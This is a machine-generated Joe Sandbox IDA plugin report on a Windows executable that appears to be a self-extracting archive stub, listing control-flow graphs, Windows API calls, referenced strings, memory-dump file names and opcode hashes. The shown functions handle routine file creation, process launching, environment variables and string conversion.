                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$ItemShowWindow
                                                                                                              • String ID: \
                                                                                                              • API String ID: 1207805008-2967466578
                                                                                                              • Opcode ID: 711646181c1064a748e4a4816867336f32ca34d823c7059bb5cea9dbfcef7785
                                                                                                              • Instruction ID: 5b32a8070802d9944ccd5aa6a137d1f01bd060cc0751dff1828a08d0b73212bf
                                                                                                              • Opcode Fuzzy Hash: 711646181c1064a748e4a4816867336f32ca34d823c7059bb5cea9dbfcef7785
                                                                                                              • Instruction Fuzzy Hash: 6E2146712857047BE311EB249C45FAF7EDCEFC2714F100929FA90A61D1C7A959088BAB

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 621 45b9aa-45b9c2 call 45cec0 624 45bc0e-45bc16 621->624 625 45b9c8-45b9d4 call 4620b3 621->625 625->624 628 45b9da-45ba02 call 45dea0 625->628 631 45ba04 628->631 632 45ba0c-45ba19 628->632 631->632 633 45ba1d-45ba26 632->633 634 45ba1b 632->634 635 45ba5e 633->635 636 45ba28-45ba2a 633->636 634->633 638 45ba62-45ba64 635->638 637 45ba32-45ba35 636->637 639 45bbc2-45bbc7 637->639 640 45ba3b-45ba43 637->640 641 45ba66-45ba69 638->641 642 45ba6b-45ba6d 638->642 645 45bbbc-45bbc0 639->645 646 45bbc9 639->646 643 45ba49-45ba4f 640->643 644 45bbdb-45bbe3 640->644 641->642 647 45ba80-45ba92 call 44b09c 641->647 642->647 648 45ba6f-45ba76 642->648 643->644 653 45ba55-45ba5c 643->653 649 45bbe5-45bbe7 644->649 650 45bbeb-45bbf3 644->650 645->639 654 45bbce-45bbd2 645->654 646->654 656 45ba94-45baa1 call 450b12 647->656 657 45baab-45bab6 call 449dff 647->657 648->647 651 45ba78 648->651 649->650 650->638 651->647 653->635 653->637 654->644 656->657 662 45baa3 656->662 663 45bad3-45bae0 ShellExecuteExW 657->663 664 45bab8-45bacf call 44ae20 657->664 662->657 666 45bae6-45baf9 663->666 667 45bc0c-45bc0d 663->667 664->663 668 45bb0c-45bb0e 666->668 669 45bafb-45bb02 666->669 667->624 672 45bb21-45bb40 call 45be69 668->672 673 45bb10-45bb19 668->673 669->668 671 45bb04-45bb0a 669->671 671->668 674 45bb77-45bb83 CloseHandle 671->674 672->674 691 45bb42-45bb4a 672->691 673->672 682 45bb1b-45bb1f ShowWindow 673->682 675 45bb85-45bb92 call 450b12 674->675 676 45bb94-45bba2 674->676 675->676 688 45bbf8 675->688 680 45bba4-45bba6 676->680 681 45bbff-45bc01 676->681 680->681 686 45bba8-45bbae 680->686 681->667 685 45bc03-45bc05 681->685 682->672 685->667 689 45bc07-45bc0a ShowWindow 685->689 686->681 690 45bbb0-45bbba 686->690 688->681 689->667 690->681 691->674 692 45bb4c-45bb5d GetExitCodeProcess 691->692 692->674 693 45bb5f-45bb69 692->693 694 45bb70 693->694 695 45bb6b 693->695 694->674 695->694
                                                                                                              APIs
                                                                                                              • ShellExecuteExW.SHELL32(000001C0), ref: 0045BAD8
                                                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0045BB1D
                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0045BB55
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0045BB7B
                                                                                                              • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0045BC0A
                                                                                                                • Part of subcall function 00450B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0044AC49,?,?,?,0044ABF8,?,-00000002,?,00000000,?), ref: 00450B28
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                                              • String ID: $*QH$.exe$.inf
                                                                                                              • API String ID: 3686203788-3063905891
                                                                                                              • Opcode ID: 22cddfb78114f65f2be5f36f5ad429d117f35ce898017684cedc71401d1049a7
                                                                                                              • Instruction ID: cb7f5664ee679688dac2eaa60cf9667ccf892219f6fcec9d07c0af1758208737
                                                                                                              • Opcode Fuzzy Hash: 22cddfb78114f65f2be5f36f5ad429d117f35ce898017684cedc71401d1049a7
                                                                                                              • Instruction Fuzzy Hash: BD51D0705057809AD731DF2489406BBB7E4EF81705F04082FECC193256EBA9AD8CCB9E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 696 44cacc-44cb00 call 45cdf0 call 45cec0 call 460138 703 44cb02-44cb31 GetModuleFileNameW call 44b88c call 44f0e6 696->703 704 44cb33-44cb3c call 44f10e 696->704 708 44cb41-44cb65 call 449401 call 44973d 703->708 704->708 715 44cdb8-44cdd3 call 449437 708->715 716 44cb6b-44cb74 708->716 717 44cb77-44cb7a 716->717 719 44cb80-44cb86 call 449aeb 717->719 720 44cca8-44ccc8 call 4499e0 call 4620d3 717->720 725 44cb8b-44cbb2 call 44990d 719->725 720->715 730 44ccce-44cce7 call 44990d 720->730 731 44cc71-44cc74 725->731 732 44cbb8-44cbc0 725->732 746 44ccf0-44cd02 call 4620d3 730->746 747 44cce9-44ccee 730->747 736 44cc77-44cc99 call 4499e0 731->736 734 44cbc2-44cbca 732->734 735 44cbeb-44cbf6 732->735 734->735 741 44cbcc-44cbe6 call 463660 734->741 737 44cc21-44cc29 735->737 738 44cbf8-44cc04 735->738 736->717 750 44cc9f-44cca2 736->750 744 44cc55-44cc59 737->744 745 44cc2b-44cc33 737->745 738->737 742 44cc06-44cc0b 738->742 761 44cc67-44cc6f 741->761 762 44cbe8 741->762 742->737 749 44cc0d-44cc1f call 463589 742->749 744->731 752 44cc5b-44cc5e 744->752 745->744 751 44cc35-44cc4f call 463660 745->751 746->715 767 44cd08-44cd25 call 4506e9 call 4620ce 746->767 753 44cd27-44cd2f 747->753 749->737 769 44cc63 749->769 750->715 750->720 751->715 751->744 752->732 757 44cd34-44cd41 753->757 758 44cd31 753->758 764 44cd43-44cd45 757->764 765 44cdad-44cdb5 757->765 758->757 761->736 762->735 770 44cd46-44cd50 764->770 765->715 767->753 769->761 770->765 772 44cd52-44cd56 770->772 774 44cd90-44cd93 772->774 775 44cd58-44cd5f 772->775 777 44cd95-44cd9b 774->777 778 44cd9d-44cd9f 774->778 779 44cd86 775->779 780 44cd61-44cd64 775->780 777->778 782 44cda0 777->782 778->782 781 44cd88-44cd8e 779->781 783 44cd66-44cd69 780->783 784 44cd82-44cd84 780->784 785 44cda4-44cdab 781->785 782->785 786 44cd7e-44cd80 783->786 787 44cd6b-44cd6e 783->787 784->781 785->765 785->770 786->781 788 44cd70-44cd74 787->788 789 44cd7a-44cd7c 787->789 788->782 790 44cd76-44cd78 788->790 789->781 790->781
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 0044CAD1
                                                                                                              • _wcschr.LIBVCRUNTIME ref: 0044CAEF
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0044CAB3,?), ref: 0044CB0A
                                                                                                                • Part of subcall function 004506E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0044B25B,00000000,?,?,?,?), ref: 00450705
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                                                                                              • String ID: *messages***$*messages***$R$a
                                                                                                              • API String ID: 803915177-2900423073
                                                                                                              • Opcode ID: b826178ff34eadcb8f28f4294f789a87b7119bfc05fd530415d1cc1a88aaa18a
                                                                                                              • Instruction ID: cf2b89aacc26db48cea101a6d89beafb1628391dc309c6161e7d238b80e1decc
                                                                                                              • Opcode Fuzzy Hash: b826178ff34eadcb8f28f4294f789a87b7119bfc05fd530415d1cc1a88aaa18a
                                                                                                              • Instruction Fuzzy Hash: CC9124B1E012049AFB70DF64CCC5BAFB7A4EF44304F18446FE649A7291EA789D85CB58

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 791 4673ae-4673c7 792 4673dd-4673e2 791->792 793 4673c9-4673d9 call 46b9bc 791->793 795 4673e4-4673ec 792->795 796 4673ef-467413 MultiByteToWideChar 792->796 793->792 800 4673db 793->800 795->796 798 4675a6-4675b9 call 45d783 796->798 799 467419-467425 796->799 801 467427-467438 799->801 802 467479 799->802 800->792 805 467457-467468 call 4659fc 801->805 806 46743a-467449 call 46f160 801->806 804 46747b-46747d 802->804 808 467483-467496 MultiByteToWideChar 804->808 809 46759b 804->809 805->809 819 46746e 805->819 806->809 818 46744f-467455 806->818 808->809 812 46749c-4674ae call 467a09 808->812 813 46759d-4675a4 call 467616 809->813 821 4674b3-4674b7 812->821 813->798 820 467474-467477 818->820 819->820 820->804 821->809 823 4674bd-4674c4 821->823 824 4674c6-4674cb 823->824 825 4674fe-46750a 823->825 824->813 826 4674d1-4674d3 824->826 827 467556 825->827 828 46750c-46751d 825->828 826->809 831 4674d9-4674f3 call 467a09 826->831 832 467558-46755a 827->832 829 46751f-46752e call 46f160 828->829 830 467538-467549 call 4659fc 828->830 836 467594-46759a call 467616 829->836 843 467530-467536 829->843 830->836 845 46754b 830->845 831->813 846 4674f9 831->846 832->836 837 46755c-467575 call 467a09 832->837 836->809 837->836 849 467577-46757e 837->849 848 467551-467554 843->848 845->848 846->809 848->832 850 467580-467581 849->850 851 4675ba-4675c0 849->851 852 467582-467592 WideCharToMultiByte 850->852 851->852 852->836 853 4675c2-4675c9 call 467616 852->853 853->813
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00462FC2,00462FC2,?,?,?,004675FF,00000001,00000001,F5E85006), ref: 00467408
                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004675FF,00000001,00000001,F5E85006,?,?,?), ref: 0046748E
                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00467588
                                                                                                              • __freea.LIBCMT ref: 00467595
                                                                                                                • Part of subcall function 004659FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004623AA,?,0000015D,?,?,?,?,00462F29,000000FF,00000000,?,?), ref: 00465A2E
                                                                                                              • __freea.LIBCMT ref: 0046759E
                                                                                                              • __freea.LIBCMT ref: 004675C3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1414292761-0
                                                                                                              • Opcode ID: 15139868f428cd1435bb3c9c4474c2f62ab8a7099b1c7487860ffe07e46c6368
                                                                                                              • Instruction ID: c2aae15c2e8386ffe5721c97099ab657064a25f652e69077434a0b4ef4f63872
                                                                                                              • Opcode Fuzzy Hash: 15139868f428cd1435bb3c9c4474c2f62ab8a7099b1c7487860ffe07e46c6368
                                                                                                              • Instruction Fuzzy Hash: E0510472604216BBEB259F64CC41EBF37A9EB44758F24466AFC05D7241FB38DC80C65A

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 0044F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0044F324
                                                                                                                • Part of subcall function 0044F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0044DEC8,Crypt32.dll,?,0044DF4A,?,0044DF2E,?,?,?,?), ref: 0044F346
                                                                                                              • OleInitialize.OLE32(00000000), ref: 0045904F
                                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00459086
                                                                                                              • SHGetMalloc.SHELL32(004820E8), ref: 00459090
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                              • String ID: riched20.dll$3Ro
                                                                                                              • API String ID: 3498096277-3613677438
                                                                                                              • Opcode ID: f905e55c29de2ea9112203308be036bdf19e12c144a85be99cddf056e4ec39b1
                                                                                                              • Instruction ID: e0bafc7d42a4198824686420cb524a22212c683947859cf730e31eed09d1ef3a
                                                                                                              • Opcode Fuzzy Hash: f905e55c29de2ea9112203308be036bdf19e12c144a85be99cddf056e4ec39b1
                                                                                                              • Instruction Fuzzy Hash: 63F04FB5C00209ABC710AF9ADD499EEFFFCEF84305F10406BE808E2210D7B81645CBA5

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 0044FDC9: ResetEvent.KERNEL32(?,?,0044F9F3,010234D8,?,00481E74,00000000,0046F79B,000000FF,000001B8,0044FC8F,?,?,?,?,0044A5A0), ref: 0044FDE9
                                                                                                                • Part of subcall function 0044FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,0044A5A0,?,?,?,?,0046F79B,000000FF), ref: 0044FDFD
                                                                                                              • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0044FA05
                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 0044FA1F
                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 0044FA38
                                                                                                              • CloseHandle.KERNELBASE(?), ref: 0044FA44
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0044FA50
                                                                                                                • Part of subcall function 0044FAC7: WaitForSingleObject.KERNEL32(?,000000FF,0044FD0B,?,?,0044FD80,?,?,?,?,?,0044FD6A), ref: 0044FACD
                                                                                                                • Part of subcall function 0044FAC7: GetLastError.KERNEL32(?,?,0044FD80,?,?,?,?,?,0044FD6A), ref: 0044FAD9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 1868215902-0
                                                                                                              • Opcode ID: 17596e75c839f75548794c7035bac1625b1166a976557660ac704ce185318c17
                                                                                                              • Instruction ID: 1aa2d8c1439f16c21030735a0fdf343567968c92e679083985a1b3593ea85481
                                                                                                              • Opcode Fuzzy Hash: 17596e75c839f75548794c7035bac1625b1166a976557660ac704ce185318c17
                                                                                                              • Instruction Fuzzy Hash: BE01B132400784EFD7319F29ED88F8ABBEAFB45720F00453AF29E92560DB752844CB65

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 896 458fc8-458fe7 GetClassNameW 897 45900f-459011 896->897 898 458fe9-458ffe call 450b12 896->898 900 459013-459016 SHAutoComplete 897->900 901 45901c-459020 897->901 903 459000-45900c FindWindowExW 898->903 904 45900e 898->904 900->901 903->904 904->897
                                                                                                              APIs
                                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00458FDF
                                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00459016
                                                                                                                • Part of subcall function 00450B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0044AC49,?,?,?,0044ABF8,?,-00000002,?,00000000,?), ref: 00450B28
                                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00459006
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                              • String ID: EDIT
                                                                                                              • API String ID: 4243998846-3080729518
                                                                                                              • Opcode ID: 7062e76cf9b627fd5a857b4d41a4ea8334ec77dcf4af28e89f09caea4c0cf340
                                                                                                              • Instruction ID: 2bf6333f9b874439a6b68be38b003c0fbccaee42b644cc70079c3483b50d530b
                                                                                                              • Opcode Fuzzy Hash: 7062e76cf9b627fd5a857b4d41a4ea8334ec77dcf4af28e89f09caea4c0cf340
                                                                                                              • Instruction Fuzzy Hash: 34F0893260122877EB305A655C05FDF766C9B85B12F440466BD04F21C1D7649D55C6EE

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 905 45be0a-45be35 call 45cec0 SetEnvironmentVariableW call 44ef07 909 45be3a-45be3e 905->909 910 45be40-45be44 909->910 911 45be62-45be66 909->911 912 45be4d-45be54 call 44effe 910->912 915 45be46-45be4c 912->915 916 45be56-45be5c SetEnvironmentVariableW 912->916 915->912 916->911
                                                                                                              APIs
                                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0045BE20
                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0045BE5C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnvironmentVariable
                                                                                                              • String ID: sfxcmd$sfxpar
                                                                                                              • API String ID: 1431749950-3493335439
                                                                                                              • Opcode ID: 0ce3e2fdb8b07402fef402c5a1ba0a02ed8664a883df2e28fdf94a08d9761fef
                                                                                                              • Instruction ID: c289b6ee7ec6cda452feb17e7e49fcd79c6c5572120c26c606e2ff46ed66849f
                                                                                                              • Opcode Fuzzy Hash: 0ce3e2fdb8b07402fef402c5a1ba0a02ed8664a883df2e28fdf94a08d9761fef
                                                                                                              • Instruction Fuzzy Hash: 2CF02772801224FAD7212F858C0AEE73798EF04B42F040057FD88A6152D72D8C84C6E8

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 917 44973d-44975e call 45cec0 920 449767 917->920 921 449760-449765 917->921 922 449769-449786 920->922 921->920 921->922 923 44978e-449798 922->923 924 449788 922->924 925 44979d-4497c8 CreateFileW 923->925 926 44979a 923->926 924->923 927 44982c-449841 925->927 928 4497ca-4497ec GetLastError call 44b275 925->928 926->925 929 449843-449856 call 44f10e 927->929 930 44985b-449866 927->930 934 4497ee-449810 CreateFileW GetLastError 928->934 935 44981b-449820 928->935 929->930 937 449816-449819 934->937 938 449812 934->938 935->927 936 449822 935->936 936->927 937->927 937->935 938->937
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,0044777A,?,00000005,?,00000011), ref: 004497BD
                                                                                                              • GetLastError.KERNEL32(?,?,0044777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004497CA
                                                                                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,0044777A,?,00000005,?), ref: 004497FF
                                                                                                              • GetLastError.KERNEL32(?,?,0044777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00449807
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorFileLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1214770103-0
                                                                                                              • Opcode ID: c06a8b90a74772e0290e5777282467c17b4c54c3ab4bdd3fda9fb46515909492
                                                                                                              • Instruction ID: e759b963fb1fb176fc6fd5532d105dd56dfef71ea3cb9d16b932af09d19d412f
                                                                                                              • Opcode Fuzzy Hash: c06a8b90a74772e0290e5777282467c17b4c54c3ab4bdd3fda9fb46515909492
                                                                                                              • Instruction Fuzzy Hash: 75313771840795AFE720AF249C45BE7BBA4FB45324F10462AF990872D1D3799C88DB94
                                                                                                              APIs
                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00449623
                                                                                                              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0044963B
                                                                                                              • GetLastError.KERNEL32 ref: 0044966D
                                                                                                              • GetLastError.KERNEL32 ref: 0044968C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2244327787-0
                                                                                                              • Opcode ID: 82992a914f2b453438b348dd40fcae7d733668237dbc664c4148ad487bb2193f
                                                                                                              • Instruction ID: b0540950ce258645dc57b8e7aeb502e8978809b8b695a1968e7267ae242b79dc
                                                                                                              • Opcode Fuzzy Hash: 82992a914f2b453438b348dd40fcae7d733668237dbc664c4148ad487bb2193f
                                                                                                              • Instruction Fuzzy Hash: E8113930600204EFEF209F65D904A6B77ADEB16335F11852BF96A85290C73E9D50EF5A
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00462213,00000000,00000000,?,00467778,00462213,00000000,00000000,00000000,?,00467975,00000006,FlsSetValue), ref: 00467803
                                                                                                              • GetLastError.KERNEL32(?,00467778,00462213,00000000,00000000,00000000,?,00467975,00000006,FlsSetValue,00473768,00473770,00000000,00000364,?,004663F1), ref: 0046780F
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00467778,00462213,00000000,00000000,00000000,?,00467975,00000006,FlsSetValue,00473768,00473770,00000000), ref: 0046781D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
